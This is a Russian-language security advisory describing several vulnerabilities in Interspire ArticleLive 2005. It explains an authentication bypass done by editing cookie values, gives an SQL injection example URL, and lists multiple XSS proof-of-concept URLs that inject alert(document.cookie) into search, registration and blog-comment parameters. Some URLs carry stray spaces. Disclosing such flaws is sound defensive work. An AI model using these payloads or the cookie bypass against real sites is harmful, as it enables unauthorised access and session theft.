Security Lab

Множественные уязвимости в ArticleLive 2005

Дата публикации:10.05.2005
Дата изменения:24.03.2009
Всего просмотров:1199
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2005-1482
CVE-2005-1483
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие системных данных
Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Interspire ArticleLive 2005
Уязвимые версии: ArticleLive 2005

Описание:
Уязвимости позволяют удаленному пользователю получить административный доступ, произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Удаленный пользователь может изменить значения переменных auth=1 и userId=1 в файле куки и получить неавторизованный административный доступ к приложению.

2. Удаленный пользователь может выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[target]/search?PHPSESSID=[si d]&
Query='Information DisclosureCategories=0

3. Отсутствует фильтрация входных данных в нескольких компонентах приложения. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/search?PHPSESSID=[sid]&Query=
'%22%3E%3Cscript%3Ealert(document.co okie)
%3C/script%3E&Categories=0

http://[target]/authors/register/do?PHPSESSID=
[sid]&Username='"><script>alert(document.cookie)
< /script>&Password=dcrab&PasswordConf irm=
dcrab&FirstName=&LastName=&Email=&Biogr
aphy=dcrab&Picture=dcrab

http://[target]/authors/register/do?PHPSESSID=[sid]
&Username=&Password=dcrab&PasswordConfirm=
dcrab&FirstName='"><script>alert(document.cookie)
< /script>&LastName=&Email=&Biography=dcrab&Picture=dcrab

http://[target]/authors/register/do?PHPSESSID=[sid]
& Usernam e=&Password=dcrab&PasswordConfirm=
dcrab&FirstName=&LastName='"><script>alert
(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab

http://[target]/authors/r egister/do?PHPSESSID=[sid]
& Username=&Password=dcrab&PasswordConfirm=
dcrab&FirstName=&LastName=&Email='"><script>alert
(document.cookie)</script>&Biography=dcrab&Pictur e=dcrab

http://[target]/authors/register/do?PHPSESSID=[sid]
& Username=&Password=dcrab&PasswordConfirm=
dcrab&FirstName=&LastName=&Email=&Biography=
%3C/textarea%3E%3C script%3Ealert(document.cookie)
%3C/script%3E&Picture=dcrab

http://[target]/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>

URL производителей: www.interspire.com/articlelive/

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"